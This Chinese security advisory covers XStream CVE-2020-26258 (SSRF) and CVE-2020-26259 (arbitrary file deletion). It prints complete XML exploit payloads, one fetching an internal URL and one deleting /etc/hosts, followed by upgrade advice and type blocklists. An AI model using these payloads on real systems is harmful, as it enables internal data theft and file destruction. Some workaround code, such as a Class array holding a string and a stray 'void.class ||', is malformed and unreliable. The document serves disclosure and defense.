【漏洞通告】XStream反序列化漏洞
发布时间 2020-12-140x00 漏洞概述
产品名称 | CVE ID | 类 型 | 漏洞等级 | 远程利用 |
XStream | CVE-2020-26258 | SSRF | 中危 | 是 |
CVE-2020-26259 | 任意文件删除 | 高危 | 是 |
0x01 漏洞详情
2020年12月13日,XStream官方发布安全公告,公开了XStream中的两个反序列化漏洞(CVE-2020-26258和CVE-2020-26259)。详情如下:
XStream服务器端请求伪造漏洞(CVE-2020-26258)
XStream反序列化时处理的流包含用于重新创建以前写入的对象的类型信息,其基于这些类型信息创建新的实例。攻击者可以通过操纵已处理的输入流并替换或插入对象,从而发起服务器端伪造请求。攻击者可利用此漏洞从未公开的内部资源中请求数据。
漏洞复现:
创建一个简单的HashMap并使用XStream将其序列化为XML(也可使用JSON等其它受支持的格式)。用以下代码替换XML,然后用XStream反序列化它:
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='javax.activation.URLDataSource'>
<url>http://localhost:8080/internal/:</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);
一旦反序列化XML,就会执行Payload并收集来自URL位置的数据。
XStream任意文件删除漏洞(CVE-2020-26259)
如果攻击者拥有操纵已处理的输入流的执行进程的权限,则攻击者可以通过利用此漏洞删除主机上的任意文件。
漏洞复现:
创建一个简单的HashMap并使用XStream将其序列化为XML(也可使用JSON等其它受支持的格式)。用以下代码替换XML,然后用XStream反序列化它:
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
<tempFile>/etc/hosts</tempFile>
</is>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);
一旦反序列化XML,就会执行Payload并删除引用文件。
影响范围:
XStream : <=1.4.14
0x02 处置建议
目前XStream已经修复了相关漏洞,建议升级至1.4.15版本。
下载链接:
https://x-stream.github.io/changes.html#1.4.15
XStream 1.4.15以下版本可使用如下解决方法:
XStream 1.4.14需在XStream的安装代码中添加2行:
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
XStream 1.4.13需在XStream的安装代码中添加3行:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
XStream 1.4.7-1.4.12如果希望使用XStream的黑名单,需要拒绝以下类型:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, "jdk.nashorn.internal.objects.NativeString", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
XStream 1.4.6及更低版本可以通过注册自己的Converter来防止Java运行时的关键类型被反序列化。
xstream.registerConverter(new Converter() {
public boolean canConvert(Class type) {
return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
|| type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
|| type == java.lang.Void.class || void.class || Proxy.isProxy(type))
|| type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
}, XStream.PRIORITY_LOW);
0x03 参考链接
http://x-stream.github.io/CVE-2020-26259.html
https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26259
0x04 时间线
2020-12-13 XStream发布安全公告
2020-12-14 VSRC发布安全通告
0x05 附录
CVSS评分标准官网:http://www.first.org/cvss/